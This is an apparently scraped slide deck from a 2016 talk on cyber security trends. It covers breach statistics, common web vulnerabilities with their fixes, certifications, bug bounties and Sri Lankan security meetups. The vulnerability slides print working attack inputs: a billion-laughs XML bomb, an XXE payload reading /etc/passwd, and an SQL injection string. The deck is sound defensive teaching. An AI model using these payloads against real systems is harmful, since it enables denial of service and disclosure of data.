Embed Size (px)
Citation preview
Recent Trends in Cyber Security
Ayoma WijethungaWSO2, Platform Security Team
Ayoma Wijethungaapi android arduino automation building
developing discusses diy electronics
engineering iot jaggery java kali linux
modular osgi prusa reprap security software
ublox web wireshark wso2o Security Engineer at WSO2, Platform Security Teamo Organizer of “Colombo White Hat Security” Meetup
o Get in touch o Email : [email protected] LinkedIn : https://lk.linkedin.com/in/ayoma o Blog : http://ayomaonline.com o Twitter / Facebook / Github / Hangout : ayomawdb
Agenda
Trends in Cyber Security:
[15%] Threat Statistics
[35%] Technical Overview of Top Threats
[05%] Education and Certifications
[10%] Individual Research Opportunities
[05%] Job Market
[10%] Local Communities
[20%] Q&A
Threat Statistics
References
Symantec - Internet Security Threat Report (VOLUME 21, APRIL 2016)
Hewlett Packard Enterprise Security Research - Cyber Risk Report 2016
Acunetix - Web Application Vulnerability Report 2016
McAfee Labs - 2016 Threats Predictions
WSO2 - Public Security Advisories
All available in public internet. Just a Google search away.
Cyber Security - Rapid Expansion of the Landscape
Cyber Security - Rapid Expansion of the Landscape
Cyber Security - Data Breaches
https://www.statista.com/statistics/273550/data-breaches-recorded-in-the-united-states-by-number-of-breaches-and-records-exposed/
Information is Beautiful: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Breach Lebel Index : http://breachlevelindex.com/top-data-breaches
Cyber Security - Data Breaches
https://www.statista.com/statistics/267132/total-damage-caused-by-by-cyber-crime-in-the-us/
Cyber Security - Data Breaches
Source: http://breachlevelindex.com/
Cyber Security - Data Breaches
Source: http://breachlevelindex.com/
Cyber Security - Technical Summary
Cyber Security - Technical Summary
The severity of instances in the top 10 CVEs
Cyber Security - Technical Summary
Cyber Security - Mobile Applications
Cyber Security - Mobile Applications
Technical Discussionon Application Vulnerabilities
XML Entity Expansion (billion laughs attack)
Vulnerable Scenario: Application parses an input XML and output a portion or a derivation of parser output.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XML External Entity Injection
Vulnerable Scenario: Application parses an input XML and output a portion or a derivation of parser output.
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Solution:factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities”, false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities”, false);
Read more at: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
Cross Site Scripting
Description: User input is rendered without proper encoding, allowing attacker to execute malicious payload on browser.
<html>
<head><title><% request.getParameter(“title”) %></title></head>
<body>.....<body>
<html>
Solution:Use proper encoding [ https://github.com/OWASP/owasp-java-encoder ].
Read more at: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Cross Site Request Forgery
Description: Forcing unintentional action on a web application in which victim is currently authenticated.
Solution: CSRF protect all state changing operations
[ https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project ].
Read more at: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Source: http://www.slideshare.net/fykim/rest-security-with-jaxrs
Cross Frame Forgery / Clickjacking
Description: Using multiple opaque layers (framing) with the intention of getting a user to perform an action on another page.
Solution: Set X-Frame-Options header properly. User frame busting scripts.
Read more at: https://www.owasp.org/index.php/Clickjacking
Source: http://computerexpertofindia.blogspot.com
Server Side Request Forgery
Description: Evade firewall and other controls by using a vulnerable host and executing malicious requests using vulnerable host on internal network / servers.
Source https://blogs.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/
SQL Injection
Description: Inject malicious content into input values and manipulating SQL statements generated by the application, to perform an unintended action.
Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery("SELECT 1 FROM customers WHERE username = '" + username + "' and password = '" + password + "'");What if “username” was 1' OR 1=1 --
SELECT 1 FROM customers WHERE username = '1’ OR 1=1 --' and password = 'abc’
Tools are widely available and risk is extremely high: SQLMap
Solution: Follow proper language specific guidelines or escape special characters in SQL statements (caution!). PreparedStatement pstmt = con.prepareStatement
("SELECT 1 FROM customers WHERE username = ? and password = ?);
Improper / Inadequate Usage of HTTP Headers
All sensitive cookies should be HTTPOnly and Secure (Session Hijacking / Sensitive Information Leakage)
X-Frame-Options header should be properly defines (Clickjacking)
X-XSS-Protection header should be set to enable browser level filtering (XSS)
Access-Control-Allow-* headers should not be misused (Cross Domain Request)
Strict-Transport-Security should be set (Man in the middle)
Public-Key-Pins should be set (Man in the middle)
Content-Security-Policy / X-Content-Type-Options
Java Colombo Meetup SessionHTTP Security Headers - every Java developer must know https://docs.google.com/presentation/d/1YT8cHetOpo9Hh2yEA_s0cL5oK7ousL0DE9N-S6ewL04/edit?usp=sharing
Education and Certifications
Cyber Security - Education and Certifications EC -Council
EC-Council Certified Ethical Hacker
EC-Council Computer Hacking Forensic Investigator
EC-Council Licensed Penetration Tester
EC-Council Certified Secure Programmer
EC-Council Certified Security Specialist
ISC2
Certified Information Systems Security Professional
Certified Cloud Security Professional
Certified Cyber Forensics Professional
Certified Secure Software Lifecycle Professional
SANS GIAC
GPEN: GIAC Certified Penetration Tester
GWAPT: GIAC Web Application Penetration Tester
GSSP-JAVA: GIAC Secure Software Programmer - Java
Offensive Security
● Offensive Security Certified
Professional (100% practical
exams)● Offensive Security Wireless
Professional
● Offensive Security Certified
Expert
● Offensive Security Exploitation
Expert
● Offensive Security Web Expert
CompTIA Security +
This is just an unordered quick summary. Not intended as brand
promotion.
Cyber Security - Education and Certifications
Search trend does not reflect every aspect.
OSCP is gaining popularity.
Individual Research Opportunities
Cyber Security - Individual Research Opportunities
https://www.facebook.com/whitehat
2,400+ valid submissions (2015)
$4.3 million cash awarded (2015)
800+ researchers around the world (2015)
https://www.google.com/about/appsecurity/reward-program/
$6 million cash awarded (2015)
Tomasz Bojarski found 70 bugs on Google in 2015
https://hackerone.com/
The Vulnerability Coordination & Bug Bounty Platform
https://bugcrowd.com/
Crowdsourced Application Security Testing
http://wso2.com/security
Get yourself listed: https://docs.wso2.com/display/Security/Acknowledgments
Local Job Market
Cyber Security - Local Job Market
WSO2
Platform Security Team initiated in December 2015
Dedicated team of 5 members
Trained security champion from each product team (~25)
Security checks integrated into CI/CD processes
Every commit goes through a static security analysis
Every build goes through a dynamic security analysis
Security awareness build up within internal engineering team (trainings / workshops)
Pearson Lanka (Pvt) Ltd
Looking for Application Security Engineer (26 September 2016): http://pearson.jobs/colombo-lka/c1-application-security-engineer/BECD35B8DCDC472680CD12A1551AA8B3/job/
SL CERT, TechCERT, PwC, Cryptogen Pvt Ltd, eCybersec
Every software or IT network service company will value cyber security knowledge and experience
Software Engineering + Security || Network Engineering + Security
Local Communities
http://www.meetup.com/Colombo-White-Hat-Security/
WSO2, Platform Security Team
http://www.meetup.com/colombo-security-meetup/
99X Technology
http://www.meetup.com/Colombo-Information-Technology-Security-Meetup-Group/
[start-up]
CAKE LABS
Cyber Security - Local Communities
https://www.facebook.com/ColomboWhiteHat
Cyber Security - Colombo White Hat Security
July 28 - Meetup Launch (279 RSVPs and unexpected number of participants)
Introduction to "Colombo White Hat Security" by Tharindu Edirisinghe
“Wireless Network Security” by Ayoma Wijethunga
“White Hat News” by Milinda Wickramasinghe
Sep 29 - 2nd Meetup (Limited RSVPs - 150 RSVPs)
"Security Verification of Software" by Lt.Col. Dr. Chandana Gamage - Former Head of Department of Computer Science and Engineering and Senior Lecturer at University of Moratuwa
"Security Considerations on Linux Package Management" by Tharindu Edirisinghe
Bimonthly meetup (without a miss!!!)
Cyber Security - Colombo White Hat Security
Q&A
